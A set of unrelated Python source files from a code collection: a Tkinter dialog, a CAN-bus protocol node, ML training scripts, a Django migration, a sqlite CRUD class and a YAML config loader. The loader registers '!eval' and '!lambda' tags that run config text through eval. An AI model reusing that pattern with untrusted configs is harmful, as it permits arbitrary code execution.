            widgets["remove"].grid(row=row, column=0, sticky=tk.W)
            widgets["component"].grid(row=row, column=1, stick=tk.EW)
            widgets["source"].grid(row=row, column=2, stick=tk.EW)
            widgets["definition"].grid(row=row, column=3, stick=tk.EW)
            widgets["count"].grid(row=row, column=4, stick=tk.EW)
            row += 1
        # The button to add a row...
        if self._add_molecule is None:
            self._add_molecule = ttk.Button(
                frame,
                text="+",
                width=5,
                command=self.add_molecule,
                takefocus=True,
            )
            self._add_molecule.focus_set()
            self._add_molecule.lift()
        self._add_molecule.grid(row=row, column=0, columnspan=3, sticky=tk.W)
        frame.grid_columnconfigure(3, weight=1)

    def right_click(self, event):
        """Probably need to add our dialog..."""
        super().right_click(event)
        self.popup_menu.add_command(label="Edit..", command=self.edit)
        self.popup_menu.tk_popup(event.x_root, event.y_root, 0)

    def handle_dialog(self, result):
        """Handle the user closing the dialog.

        On Cancel the working copy of the molecules table is discarded and
        rebuilt from the stored parameters; on OK all widget values are
        written back into ``self.node.parameters``.
        """
        if result is None or result == "Cancel":
            self.dialog.deactivate(result)
            # Reset the molecules
            for data in self._molecule_data:
                if "widgets" in data:
                    widgets = data["widgets"]
                    for w in widgets.values():
                        w.destroy()
            self._molecule_data = []
            P = self.node.parameters
            for molecule in P["molecules"].value:
                self._molecule_data.append({**molecule})
            super().handle_dialog(result)
            return
        if result == "Help":
            # display help!!!
            return
        if result != "OK":
            self.dialog.deactivate(result)
            raise RuntimeError("Don't recognize dialog result '{}'".format(result))
        self.dialog.deactivate(result)
        # Shortcut for parameters
        P = self.node.parameters
        for key in P:
            if key not in ("molecules",):
                P[key].set_from_widget()
        # And handle the molecules
        molecules = []
        for data in self._molecule_data:
            widgets = data["widgets"]
            molecules.append(
                {
                    "component": widgets["component"].get(),
                    "source": widgets["source"].get(),
                    "definition": widgets["definition"].get(),
                    "count": widgets["count"].get(),
                }
            )
        P["molecules"].value = molecules

    def add_molecule(self):
        """Add a new row to the molecule table."""
        self._molecule_data.append(
            {
                "component": "fluid",
                "source": "SMILES",
                "definition": "",
                "count": "1",
            }
        )
        self.reset_molecules()

    def remove_molecule(self, row):
        """Remove a molecule entry from the table.

        Parameters
        ----------
        row : int
            The row in the table to remove. Note the first molecule is at row 1.
        """
        index = row - 1
        data = self._molecule_data[index]
        if "widgets" in data:
            for w in data["widgets"].values():
                w.destroy()
        del self._molecule_data[index]
        self.reset_molecules()
| StarcoderdataPython |
3244997 | # Copyright (C) 2016-2019 Virgil Security Inc.
#
# Lead Maintainer: <NAME> Inc. <<EMAIL>>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# (1) Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# (2) Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# (3) Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import platform
class VirgilAgentAdapter(object):
    """Request adapter that attaches the ``virgil-agent`` metrics header."""

    def __init__(self, product, version):
        # type: (str, str) -> None
        """Remember the product identity reported to the Cloud for metrics."""
        self.__key = "virgil-agent"
        self.__product = product
        self.__family = "python"
        self.__version = version
        self.__platform = platform.system().lower()

    def adapt(self, request):
        # type: (Request) -> Request
        """
        Add the virgil-agent header to *request*.

        The header value has the form ``product;family;platform;version``.

        Args:
            request: request to modify
        Returns:
            the same request with the virgil-agent header set
        """
        headers = request.headers
        headers[self.__key] = ";".join(
            (self.__product, self.__family, self.__platform, self.__version)
        )
        request.headers = headers
        return request
| StarcoderdataPython |
1784189 | from pytextrank import json_iter, parse_doc, pretty_print, normalize_key_phrases, render_ranks, text_rank, rank_kernel, top_sentences, limit_keyphrases, limit_sentences, make_sentence
import sys
## Summarization stage:
## * extract a short summary from the top-ranked key phrases (stage 2)
##   and the top-ranked sentences (stage 3)
##
## INPUTS: <stage2> <stage3>
## OUTPUT: Markdown-formatted excerpts and keywords
if __name__ == "__main__":
    # Paths to the stage-2 (key phrases) and stage-3 (ranked sentences) outputs.
    keyphrase_path, sentence_path = sys.argv[1], sys.argv[2]
    # Collapse the top-ranked key phrases into one comma-separated string.
    phrases = ", ".join(set(limit_keyphrases(keyphrase_path, phrase_limit=12)))
    # Restore the selected sentences to their original document order.
    ordered = sorted(limit_sentences(sentence_path, word_limit=150),
                     key=lambda pair: pair[1])
    graf_text = " ".join(make_sentence(text) for text, _ in ordered)
    print("**excerpts:** %s\n\n**keywords:** %s" % (graf_text, phrases,))
4814823 | import os
import torch
import pandas as pd
import segmentation_models_pytorch as smp
from catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, InferCallback, CheckpointCallback
from catalyst.dl.runner import SupervisedRunner
from catalyst.dl import utils
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau, CosineAnnealingLR
from steel.io.dataset import ClassificationSteelDataset
from steel.models.classification_model import ResNet34
from utils import get_preprocessing, get_training_augmentation, get_validation_augmentation, setup_train_and_sub_df, seed_everything
def main(args):
    """
    Main code for training a 4-class steel-defect classification model
    (ResNet34 backbone with ImageNet weights).

    Args:
        args (argparse.Namespace): parsed command line arguments; must provide
            dset_path, num_epochs, batch_size, test_size, split_seed and
            num_workers.
    Returns:
        None
    """
    # Load the train dataframe, submission template, and per-image mask counts.
    # NOTE: the direct pd.read_csv() calls that previously preceded this were
    # dead code -- their results were immediately overwritten by this helper.
    train, sub, id_mask_count = setup_train_and_sub_df(args.dset_path)
    # Reproducible train/val split, stratified by the number of masks per image.
    seed_everything(args.split_seed)
    train_ids, valid_ids = train_test_split(id_mask_count["im_id"].values, random_state=args.split_seed,
                                            stratify=id_mask_count["count"], test_size=args.test_size)
    # setting up the classification model
    ENCODER_WEIGHTS = "imagenet"
    DEVICE = "cuda"  # NOTE(review): unused here; device selection is left to catalyst
    model = ResNet34(pre=ENCODER_WEIGHTS, num_classes=4, use_simple_head=True)
    preprocessing_fn = smp.encoders.get_preprocessing_fn("resnet34", ENCODER_WEIGHTS)
    # Setting up the I/O: augmented train set, lightly-transformed valid set
    train_dataset = ClassificationSteelDataset(
        args.dset_path, df=train, datatype="train", im_ids=train_ids,
        transforms=get_training_augmentation(),
        preprocessing=get_preprocessing(preprocessing_fn),
    )
    valid_dataset = ClassificationSteelDataset(
        args.dset_path, df=train, datatype="valid", im_ids=valid_ids,
        transforms=get_validation_augmentation(),
        preprocessing=get_preprocessing(preprocessing_fn),
    )
    train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
    valid_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
    loaders = {
        "train": train_loader,
        "valid": valid_loader
    }
    # everything is saved here (i.e. weights + stats)
    logdir = "./logs/segmentation"
    # model, criterion, optimizer, LR schedule
    optimizer = torch.optim.Adam(model.parameters(), lr=3e-4)
    scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=2)
    criterion = smp.utils.losses.BCEDiceLoss(eps=1.)
    runner = SupervisedRunner()
    runner.train(
        model=model,
        criterion=criterion,
        optimizer=optimizer,
        scheduler=scheduler,
        loaders=loaders,
        callbacks=[DiceCallback(), EarlyStoppingCallback(patience=5, min_delta=0.001)],
        logdir=logdir,
        num_epochs=args.num_epochs,
        verbose=True
    )
    utils.plot_metrics(
        logdir=logdir,
        # specify which metrics we want to plot
        metrics=["loss", "dice", "lr", "_base/lr"]
    )
if __name__ == "__main__":
    import argparse

    # Command-line interface for launching a training run.
    cli = argparse.ArgumentParser(description="For training.")
    cli.add_argument("--dset_path", type=str, required=True,
                     help="Path to the unzipped kaggle dataset directory.")
    cli.add_argument("--num_epochs", type=int, required=False, default=21,
                     help="Number of epochs")
    cli.add_argument("--batch_size", type=int, required=False, default=16,
                     help="Batch size")
    cli.add_argument("--test_size", type=float, required=False, default=0.1,
                     help="Fraction of total dataset to make the validation set.")
    cli.add_argument("--split_seed", type=int, required=False, default=42,
                     help="Seed for the train/val dataset split")
    cli.add_argument("--num_workers", type=int, required=False, default=2,
                     help="Number of workers for data loaders.")
    main(cli.parse_args())
| StarcoderdataPython |
3286440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import cobra.models.fields.foreignkey
import cobra.models.fields.bounded
from django.conf import settings
class Migration(migrations.Migration):
    """Auto-generated migration: create the WorkReport model (table ``cobra_summary``)."""

    # Must run after the organization avatar migration and the user model.
    dependencies = [
        ('organization', '0003_organization_avatar'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='WorkReport',
            fields=[
                ('id', cobra.models.fields.bounded.BoundedBigAutoField(serialize=False, primary_key=True)),
                ('content', models.TextField(null=True, verbose_name='Content', blank=True)),
                ('summary', models.TextField(null=True, verbose_name='Summary', blank=True)),
                ('plan', models.TextField(null=True, verbose_name='Plan', blank=True)),
                ('type', models.CharField(max_length=10, verbose_name='Work Report Type')),
                ('year', models.IntegerField(verbose_name='Year')),
                ('serial_number', models.IntegerField(null=True, verbose_name='Serial Number', blank=True)),
                ('organization', cobra.models.fields.foreignkey.FlexibleForeignKey(to='organization.Organization')),
                ('owner', cobra.models.fields.foreignkey.FlexibleForeignKey(to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
                'db_table': 'cobra_summary',
            },
            bases=(models.Model,),
        ),
    ]
| StarcoderdataPython |
33937 | import os
import random
from sklearn.metrics import mean_squared_error as mse
from core.composer.chain import Chain
from core.composer.composer import ComposerRequirements, DummyChainTypeEnum, DummyComposer
from core.models.data import OutputData
from core.models.model import *
from core.repository.dataset_types import NumericalDataTypesEnum, CategoricalDataTypesEnum
from core.repository.model_types_repository import (
ModelMetaInfoTemplate,
ModelTypesRepository
)
from core.repository.quality_metrics_repository import MetricsRepository, RegressionMetricsEnum
from core.repository.task_types import MachineLearningTasksEnum
from core.utils import project_root
# Fix RNG seeds so the composition/validation run is reproducible.
random.seed(1)
np.random.seed(1)
import matplotlib.pyplot as plt
def compare_plot(predicted: OutputData, dataset_to_validate: InputData):
    """Plot observed vs. predicted series on one axes and show the figure."""
    fig, ax = plt.subplots()
    for series, label in ((dataset_to_validate.target, "Observed"),
                          (predicted.predict, "Predicted")):
        plt.plot(series, linewidth=1, label=label)
    ax.legend()
    plt.show()
def calculate_validation_metric(chain: Chain, dataset_to_validate: InputData) -> float:
    """
    Evaluate a fitted chain on a hold-out dataset and return the RMSE.

    Side effect: shows a matplotlib comparison plot of observed vs. predicted.

    Args:
        chain: a fitted composite model
        dataset_to_validate: hold-out data with a ``target`` attribute
    Returns:
        float: root-mean-square error between target and prediction
    """
    # the execution of the obtained composite models
    predicted = chain.predict(dataset_to_validate)
    # plot results
    compare_plot(predicted, dataset_to_validate)
    # the quality assessment for the simulation results
    # (squared=False makes this RMSE; the local was previously misnamed
    # roc_auc_value)
    rmse_value = mse(y_true=dataset_to_validate.target,
                     y_pred=predicted.predict,
                     squared=False)
    return rmse_value
# the dataset was obtained from NEMO model simulation
# specify problem type
problem_class = MachineLearningTasksEnum.auto_regression
# a dataset that will be used as a train and test set during composition
file_path_train = 'cases/data/ts/metocean_data_train.csv'
full_path_train = os.path.join(str(project_root()), file_path_train)
dataset_to_compose = InputData.from_csv(full_path_train, task_type=problem_class)
# a dataset for a final validation of the composed model
file_path_test = 'cases/data/ts/metocean_data_test.csv'
full_path_test = os.path.join(str(project_root()), file_path_test)
dataset_to_validate = InputData.from_csv(full_path_test, task_type=problem_class)
# the search of the models provided by the framework that can be used as nodes in a chain for the selected task
# NOTE(review): available_model_types is not used below -- the composer is
# restricted to the AR model explicitly; verify the search is still wanted.
models_repo = ModelTypesRepository()
available_model_types, _ = models_repo.search_models(
    desired_metainfo=ModelMetaInfoTemplate(input_type=NumericalDataTypesEnum.table,
                                           output_type=CategoricalDataTypesEnum.vector,
                                           task_type=problem_class,
                                           can_be_initial=True,
                                           can_be_secondary=True))
# the choice of the metric for the chain quality assessment during composition
metric_function = MetricsRepository().metric_by_id(RegressionMetricsEnum.RMSE)
# the choice and initialisation of a single-model (AR) flat chain
single_composer_requirements = ComposerRequirements(primary=[ModelTypesIdsEnum.ar],
                                                    secondary=[])
chain_single = DummyComposer(
    DummyChainTypeEnum.flat).compose_chain(data=dataset_to_compose,
                                           initial_chain=None,
                                           composer_requirements=single_composer_requirements,
                                           metrics=metric_function)
train_prediction = chain_single.fit(input_data=dataset_to_compose, verbose=True)
print("Composition finished")
compare_plot(train_prediction, dataset_to_compose)
# the quality assessment for the obtained composite models
rmse_on_valid_single = calculate_validation_metric(chain_single, dataset_to_validate)
print(f'Static RMSE is {round(rmse_on_valid_single, 3)}')
1618844 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from struct import pack, unpack
from threading import Condition
from stucancommon.node import Service, CanNode, Timeout
from .addresses import RCC_GROUP_DEVICE_ID
logger = logging.getLogger(__name__)
class Request(Service):
    """
    Base class for a request service that has a condition variable used to
    wait until notification from another thread (see ``Response.handle``).
    """
    # Class-level condition variable shared by all instances of a given
    # Request subclass; the matching Response notifies it on arrival.
    cv = Condition()
class Response(Service):
    """
    Base class for a response service.

    Subclasses bind ``request_class`` to the matching Request subclass;
    ``handle`` delivers the outcome to the thread blocked on that request's
    condition variable.
    """

    def handle(self, source_address, destination_address, exception=None):
        """
        Handle the response to a previously sent request service.

        On success, store this response object on the request class; otherwise
        forward the exception. The waiting thread is notified once every
        expected response has been accounted for.
        """
        request = self.request_class
        with request.cv:
            request.response = self if exception is None else exception
            request.response_count -= 1
            if not request.response_count:
                request.cv.notify()
class ReadUserInfoRequest(Request):
    """Request half of the Read User Info service."""

    # Service identifier shared by request and response.
    SERVICE_ID = 0x0
    # Big-endian payload layout: unsigned 16-bit info identifier.
    PACK_FORMAT = '>H'

    def __init__(self, *args):
        # First positional argument: identifier of the info value to read.
        self.info_id = args[0]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.info_id)
class ReadUserInfoResponse(Response):
    """Response half of the Read User Info service."""

    # Service identifier shared by request and response.
    SERVICE_ID = 0x0
    # Big-endian payload layout: u16 info identifier, f32 value.
    PACK_FORMAT = '>Hf'
    # Request service this response is matched against.
    request_class = ReadUserInfoRequest

    def __init__(self, *args):
        self.info_id, self.value = args[:2]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.info_id, self.value)
class WriteParameterRequest(Request):
    """Request half of the Write Parameter service."""

    # Service identifier shared by request and response.
    SERVICE_ID = 0x2
    # Big-endian payload layout: u16 parameter id, u8 part index, f32 value.
    PACK_FORMAT = '>HBf'

    def __init__(self, *args):
        self.parameter_id, self.part, self.value = args[:3]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class WriteParameterResponse(Response):
    """Response half of the Write Parameter service (id 0x2)."""

    SERVICE_ID = 0x2      # service identifier on the bus
    PACK_FORMAT = '>HBf'  # payload: big-endian u16 parameter id, u8 part, f32 value
    # Request type whose waiter this response resolves.
    request_class = WriteParameterRequest

    def __init__(self, *args):
        self.parameter_id, self.part, self.value = args[:3]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class ReadParameterRequest(Request):
    """Request half of the Read Parameter service (id 0x1)."""

    SERVICE_ID = 0x1     # service identifier on the bus
    PACK_FORMAT = '>HB'  # payload: big-endian u16 parameter id, u8 part

    def __init__(self, *args):
        self.parameter_id, self.part = args[:2]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.parameter_id, self.part)
class ReadParameterResponse(Response):
    """Response half of the Read Parameter service (id 0x1)."""

    SERVICE_ID = 0x1      # service identifier on the bus
    PACK_FORMAT = '>HBf'  # payload: big-endian u16 parameter id, u8 part, f32 value
    # Request type whose waiter this response resolves.
    request_class = ReadParameterRequest

    def __init__(self, *args):
        self.parameter_id, self.part, self.value = args[:3]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class MessageNotification(Response):
    """Unsolicited Message Notification service (id 0x3)."""

    SERVICE_ID = 0x3     # service identifier on the bus
    PACK_FORMAT = '>HI'  # payload: big-endian u16 message id, u32 value
    # Class-level accumulator: every notification received on the bus is
    # recorded here as a (source_address, notification) pair.
    messages = []

    def __init__(self, *args):
        self.message_id, self.value = args[:2]

    def __bytes__(self):
        return pack(self.PACK_FORMAT, self.message_id, self.value)

    def handle(self, source_address, destination_address, exception=None):
        # Notifications are stored rather than answered; the implicit None
        # return tells the node that no reply frame should be sent.
        self.messages.append((source_address, self))
error_identifier_dictionary = {
0x01: 'INVALID_FRAME',
0x02: 'DEVICE_NOT_FOUND',
0x03: 'RESPONSE_TIMEOUT',
0x12: 'INVALID_SERVICE_ARGUMENT',
0x13: 'GATEWAY_BUSY',
0x22: 'OBJECT_ID_NOT_FOUND',
0x24: 'INVALID_DATA_LENGTH',
0x25: 'PROPERTY_IS_READ_ONLY',
0x26: 'INVALID_DATA',
0x27: 'DATA_TOO_SMALL',
0x28: 'DATA_TOO_BIG',
0x29: 'WRITE_PROPERTY_FAILED',
0x2A: 'READ_PROPERTY_FAILED',
0x2B: 'ACCESS_DENIED',
0x2D: 'MULTICAST_READ_NOT_SUPPORTED',
}
"""
Those error codes applies for "User Info read service" and "Parameter read/write service".
They are coded in the response in case of a request failure.
"""
class StuCanPublicError(Exception):
    """
    Exception describing a StuCan2 protocol error reported by a device.

    Attributes
    ----------
    id : int
        Service object identifier the error relates to
    error_code : int
        Raw numeric error code received on the bus
    identifier : str
        Human-readable name for the error code ('UNKNOWN' when unmapped)
    """

    def __init__(self, id, error_code):
        # `id` shadows the builtin of the same name; kept for backward
        # compatibility with existing callers.
        self.id = id
        self.error_code = error_code
        self.identifier = error_identifier_dictionary.get(error_code, 'UNKNOWN')

    def __str__(self):
        template = 'StuCanPublicError(id={}, error_code={}, identifier={})'
        return template.format(self.id, self.error_code, self.identifier)
class StuCanPublicNode(CanNode):
    """
    Class representing a StuCan2 public node; inherits from `CanNode`.
    """
    def __init__(self, driver, address, debug=False):
        """
        Initialize CanNode
        driver : PythonCanDriver
            Underlying CAN interface
        address : int
            Node CAN address
        debug : bool
            When True, configure the root logger at DEBUG level
        """
        CanNode.__init__(self, driver, address)
        if debug is True:
            logging.basicConfig(level=logging.DEBUG)
    def handle_rx_frame(self, identifier, data, dlc, flag, time):
        """
        Handle a frame received on the CAN bus
        Manage behavior as described in the StuCan2 public protocol
        Parameters
        ----------
        identifier : int
            29-bit extended CAN frame id packing destination, source,
            service id and flags (see bit layout below)
        data : bytes
            CAN frame data
        """
        # Bits 28..19 of the extended id: destination device address (10 bits).
        destination_address = (identifier >> 19) & 0x3FF
        if not (destination_address in (self.address, RCC_GROUP_DEVICE_ID)):
            return
        # Bits 18..9: source address; bits 8..6: service id; bits 5..0: flags.
        source_address = (identifier >> 9) & 0x3FF
        service_id = (identifier >> 6) & 0x7
        flags = identifier & 0x3F
        # Bit 0 of the flags signals an error frame.
        error = flags & 0x1
        # NOTE(review): request and response classes for the same service
        # share one SERVICE_ID, so this loop may match several classes in
        # self.services — confirm only one side is registered per node.
        for service_class in self.services:
            if service_id == service_class.SERVICE_ID:
                if error == 1:
                    # Error frames carry a (service object id, error code)
                    # pair instead of the normal payload.
                    id, error_code = unpack('>HI', data)
                    exception = StuCanPublicError(id, error_code)
                    logger.debug('<- rx: %s from address %d to %d', repr(exception), source_address,
                                 destination_address)
                    service = service_class(None, None, None)
                    response = service.handle(source_address, destination_address, exception)
                else:
                    service = service_class.from_bytes(data)
                    logger.debug('<- rx: %s from address %d to %d', str(service), source_address, destination_address)
                    response = service.handle(source_address, destination_address)
                if response is not None:
                    self.send_service(source_address, response)
    def send_from(self, service_id, destination_address, source_address, data):
        """
        Build the CAN identifier and hand it plus the payload to the driver
        Parameters
        ----------
        service_id : int
            StuCan2 service identifier
        destination_address : int
            Targeted device address
        source_address : int
            Source address
        data : bytes
            The data parameter of a CAN message, length from 0 to 8 bytes
        """
        assert 0 <= service_id <= 0x7
        assert 0 <= destination_address <= 0x3FF
        assert 0 <= source_address <= 0x3FF
        # Inverse of the bit layout decoded in handle_rx_frame().
        identifier = (destination_address << 19) + (source_address << 9) + (service_id << 6)
        self.driver.send(identifier, data, is_extended_id=True)
    def send(self, service_id, destination_address, data):
        """
        Forward data to send, using this node's own address as the source
        Parameters
        ----------
        service_id : int
            StuCan2 service identifier
        destination_address : int
            Targeted device address
        data : bytes
            The data parameter of a CAN message
        """
        self.send_from(service_id, destination_address, self.address, data)
    def send_service(self, address, service):
        """
        Serialize and send a service object
        Parameters
        ----------
        address : int
            Targeted device address
        service : Service
            Service object
        """
        logger.debug('-> tx: %s to address %d', str(service), address)
        data = bytes(service)
        # CAN frames carry at most 8 data bytes.
        assert len(data) <= 8
        self.send(service.SERVICE_ID, address, data)
    def wait_response(self, address, request, timeout=None):
        """
        Send a request service and block until its response arrives.
        Raises Timeout when no answer arrives in time, re-raises a
        StuCanPublicError delivered by the device, and returns the
        response object when successful.
        Parameters
        ----------
        address : int
            Targeted device address
        request : Request
            Request service object
        timeout : float or None
            Seconds to wait for the response; None waits forever
        Returns
        -------
        Response
            Response object of the service
        """
        request_class = type(request)
        request_class.response_count = 1
        # The condition is held while sending so the receiving thread cannot
        # notify before we start waiting.
        with request_class.cv:
            self.send_service(address, request)
            return_value = request_class.cv.wait(timeout)
            if not return_value:
                raise Timeout()
            if isinstance(request_class.response, StuCanPublicError):
                raise request_class.response
            return request_class.response
    def messages(self):
        """
        Retrieve the list of notification messages previously seen on the bus
        Returns
        -------
        list
            (source_address, MessageNotification) pairs
        """
        return MessageNotification.messages
| StarcoderdataPython |
118864 | from models.posts import (
BaseCreatePostModel,
BaseDeletePostModel,
CreatePostModel,
ReturnPostModel,
)
from core.errors import ConflictError
import sqlite3
from models.user import UserModel
class PostsCRUD:
    """CRUD helpers for the Posts table.

    All methods operate on a caller-supplied sqlite3 connection; transaction
    control (commit/rollback) is left to the caller. Cursors are always
    closed via try/finally.
    """

    def create(
        self, conn: sqlite3.Connection, data: BaseCreatePostModel, user: UserModel
    ) -> None:
        """Insert a new post authored by *user*."""
        data = CreatePostModel(**data.dict(), creator_id=user.id)
        cur = conn.cursor()
        try:
            cur.execute(
                "INSERT INTO Posts(id, creator, image, description, created) "
                "VALUES(?, ?, ?, ?, ?)",
                (
                    data.id,
                    data.creator_id,
                    data.image,
                    data.description,
                    data.created,
                ),
            )
        finally:
            cur.close()

    def delete(self, conn: sqlite3.Connection, data: BaseDeletePostModel) -> None:
        """Delete a post, but only when the caller confirmed the action.

        Raises
        ------
        ConflictError
            If ``data.are_you_sure`` is not True.
        """
        # Validate the confirmation flag before acquiring a cursor: the
        # previous version opened the cursor first and leaked it (never
        # closed) when the ConflictError was raised.
        if data.are_you_sure is not True:
            raise ConflictError("Action was interrupted by user")
        cur = conn.cursor()
        try:
            cur.execute(
                "DELETE FROM Posts WHERE id=?",
                (data.id,),
            )
        finally:
            cur.close()

    def get_by_creator(
        self, conn: sqlite3.Connection, creator: UserModel
    ) -> list[ReturnPostModel]:
        """Return all posts by *creator*, newest first."""
        cur = conn.cursor()
        try:
            # BUGFIX: the implicit string concatenation previously produced
            # "WHERE creator=?ORDER BY ..." (missing space), which is
            # malformed SQL.
            cur.execute(
                "SELECT id, image, description, created "
                "FROM Posts "
                "WHERE creator=? "
                "ORDER BY created DESC",
                (creator.id,),
            )
            data = cur.fetchall()
            return [
                ReturnPostModel(
                    id=id,
                    creator=creator,
                    image=image,
                    description=description,
                    created=created,
                )
                for (id, image, description, created) in data
            ]
        finally:
            cur.close()

    def get_by_subsciber(
        self, conn: sqlite3.Connection, user: UserModel
    ) -> list[ReturnPostModel]:
        """Return the posts of everyone *user* subscribes to, newest first.

        NOTE: the method name (and the "Subsciptions" table name) carry a
        historical misspelling; both are kept because callers and the DB
        schema depend on them.
        """
        cur = conn.cursor()
        try:
            cur.execute(
                "SELECT Posts.id, Posts.image, Posts.description, Posts.created, User.id AS user_id, User.login "
                "FROM Posts "
                "JOIN Subsciptions ON Posts.creator = Subsciptions.to_subscribe "
                "JOIN User ON Posts.creator = User.id "
                "WHERE Subsciptions.who_subscribe = ? "
                "ORDER BY created DESC",
                (user.id,),
            )
            data = cur.fetchall()
            return [
                ReturnPostModel(
                    id=id,
                    creator={"id": user_id, "login": user_login},
                    image=image,
                    description=description,
                    created=created,
                )
                for (id, image, description, created, user_id, user_login) in data
            ]
        finally:
            cur.close()
| StarcoderdataPython |
1617194 | <gh_stars>1-10
class Item3rd:
    # Plain data holder; all fields default to empty/zero and are assigned
    # by the caller. Field names suggest a Steam market item listed on a
    # third-party marketplace — TODO confirm against the code that fills it.
    appid = ''               # application id the item belongs to
    market_hash_name = ''    # market hash name of the item
    url3rd = ''              # URL of the listing on the third-party site
    market3rd = ''           # name of the third-party marketplace
    name_in_market3rd = ''   # item name as shown on that marketplace
    lowest_sell_price = 0    # lowest sell price observed for the item
102837 | import yaml
from torch import nn, optim
from pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from monai.losses import DiceCELoss
import factorizer as ft
from factorizer import datasets
from factorizer.utils.lightning import SemanticSegmentation
from factorizer.utils.losses import DeepSuprLoss
from factorizer.utils.metrics import DiceMetric, HausdorffDistanceMetric
from factorizer.utils.schedulers import WarmupCosineSchedule
from factorizer.utils.helpers import SaveValResults
def lambda_constructor(loader, node):
    """Build a Python callable from a ``!lambda`` YAML scalar.

    The scalar holds everything after the ``lambda`` keyword, e.g.
    ``"x: x + 1"``.

    SECURITY: the expression is run through ``eval``, so configuration
    files must come from a trusted source.
    """
    return eval("lambda " + loader.construct_scalar(node))
def get_constructor(obj):
    """Build a PyYAML constructor that instantiates *obj* from a YAML node.

    A scalar node becomes ``obj(value)`` — or *obj* itself when the scalar
    is empty (bare tag) — a sequence node supplies positional arguments and
    a mapping node supplies keyword arguments.
    """

    def constructor(loader, node):
        if isinstance(node, yaml.nodes.ScalarNode):
            if node.value:
                built = obj(loader.construct_scalar(node))
            else:
                built = obj
        elif isinstance(node, yaml.nodes.SequenceNode):
            built = obj(*loader.construct_sequence(node, deep=True))
        elif isinstance(node, yaml.nodes.MappingNode):
            built = obj(**loader.construct_mapping(node, deep=True))
        return built

    return constructor
# Extend the safe YAML loader with custom "!Tag" constructors so experiment
# config files can instantiate models, losses, optimizers, metrics and
# callbacks directly from YAML.
Loader = yaml.SafeLoader
# general
Loader.add_constructor("!eval", get_constructor(eval))
Loader.add_constructor("!lambda", lambda_constructor)
# data modules
Loader.add_constructor(
    "!BraTSDataModule", get_constructor(datasets.BraTSDataModule)
)
Loader.add_constructor("!BraTSInferer", get_constructor(datasets.BraTSInferer))
# tasks
Loader.add_constructor(
    "!SemanticSegmentation", get_constructor(SemanticSegmentation)
)
# layers and blocks
Loader.add_constructor("!Conv3d", get_constructor(nn.Conv3d))
Loader.add_constructor("!ConvTranspose3d", get_constructor(nn.ConvTranspose3d))
Loader.add_constructor("!GroupNorm", get_constructor(nn.GroupNorm))
Loader.add_constructor("!LeakyReLU", get_constructor(nn.LeakyReLU))
Loader.add_constructor("!ReLU", get_constructor(nn.ReLU))
Loader.add_constructor("!GELU", get_constructor(nn.GELU))
Loader.add_constructor("!Same", get_constructor(ft.Same))
Loader.add_constructor("!DoubleConv", get_constructor(ft.DoubleConv))
Loader.add_constructor("!BasicBlock", get_constructor(ft.BasicBlock))
Loader.add_constructor(
    "!PreActivationBlock", get_constructor(ft.PreActivationBlock)
)
Loader.add_constructor(
    "!FactorizerSubblock", get_constructor(ft.FactorizerSubblock)
)
Loader.add_constructor("!Matricize", get_constructor(ft.Matricize))
Loader.add_constructor("!SWMatricize", get_constructor(ft.SWMatricize))
Loader.add_constructor("!NMF", get_constructor(ft.NMF))
Loader.add_constructor("!MLP", get_constructor(ft.MLP))
Loader.add_constructor(
    "!FastSelfAttention", get_constructor(ft.FastSelfAttention)
)
Loader.add_constructor("!ablate", get_constructor(ft.ablate))
# models
Loader.add_constructor("!UNet", get_constructor(ft.UNet))
Loader.add_constructor(
    "!SegmentationFactorizer", get_constructor(ft.SegmentationFactorizer)
)
# losses
Loader.add_constructor("!DiceCELoss", get_constructor(DiceCELoss))
Loader.add_constructor("!DeepSuprLoss", get_constructor(DeepSuprLoss))
# optimizers and scheduler
Loader.add_constructor("!AdamW", get_constructor(optim.AdamW))
Loader.add_constructor(
    "!WarmupCosineSchedule", get_constructor(WarmupCosineSchedule)
)
# metrics
